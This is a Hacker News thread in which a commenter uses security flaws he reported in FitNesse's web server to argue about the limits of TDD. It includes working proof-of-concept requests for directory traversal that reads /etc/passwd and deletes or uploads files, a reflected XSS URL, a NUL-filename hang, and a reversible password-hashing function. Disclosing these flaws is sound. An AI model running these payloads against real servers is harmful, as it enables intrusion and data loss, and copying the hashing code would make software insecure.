points by dalke 5 years ago

I got fed up with Robert Martin years ago.

11 years ago I wrote an essay on "Problems with TDD" - http://www.dalkescientific.com/writings/diary/archive/2009/1... .

Martin was rather against my viewpoint.

So, what's an example of TDD "done right"? It should be his "FitNesse" program, right? (http://fitnesse.org/ ) Which means that finding problems in that code should point out areas where TDD is insufficient, right?

It contains its own web server, so I looked at just that part.

1) There was a directory traversal attack, in several places. This gave access to my /etc/passwd

  curl 'http://localhost:8080/files/../../../../../../etc/passwd'

2) This GET request deleted a file:

  curl 'http://localhost:8080/files/?responder=deleteFile&filename=../../../../../../Users/dalke/This_is_a_file.txt'

3) This uploaded a file to an arbitrary location:

   POST /files/../../ HTTP/1.1 
      containing a header with
   Content-Disposition: form-data; name="file"; filename="I_escaped.txt"

4) There was a non-persistent cross-site scripting vulnerability due to incorrectly escaped HTML:

  http://localhost:8080/files?responder=%3Cscript%3Ealert%28%22hi!%22%29%3C/script%3E

5) An uploaded file with an embedded NUL in filename would result in an infinite loop in the server:

  Content-Disposition: form-data; name="file"; filename="\0foo.txt"

6) The password hashing scheme was trivially broken, that is, given the hash I could construct a password which generated the same hash. Take a look - it still uses the same hash algorithm! https://github.com/unclebob/fitnesse/blob/master/src/fitness...

These meant the system was totally p0wnable.

And I found a few public servers using FitNesse as the web server.

I reported all of these years ago, and at least some of them were fixed. If these security issues are still present now, there's been plenty of time to fix them.

My analysis helped confirm my view that TDD generates happy-path tests, and strengthen my complaint that TDD, at least in the "red-green-refactor" formalism, ignores the rest of the testing/design that needs to be done even at that development stage where TDD is most effective.

tptacek 5 years ago

6) The password hashing scheme was trivially broken, that is, given the hash I could construct a password which generated the same hash. Take a look - it still uses the same hash algorithm! https://github.com/unclebob/fitnesse/blob/master/src/fitness...

What fresh hell is this?

     private byte[] encrypt(byte[] lock, byte[] key) {
       int keyIndex = 0;
       for (int i = 0; i < lock.length; i++) {
         byte lockByte = lock[i];
         byte keyByte = key[keyIndex++];
         lock[i] = (byte) (lockByte + keyByte);
         if (keyIndex == key.length)
           keyIndex = 0;
       }
    
       return lock;
     }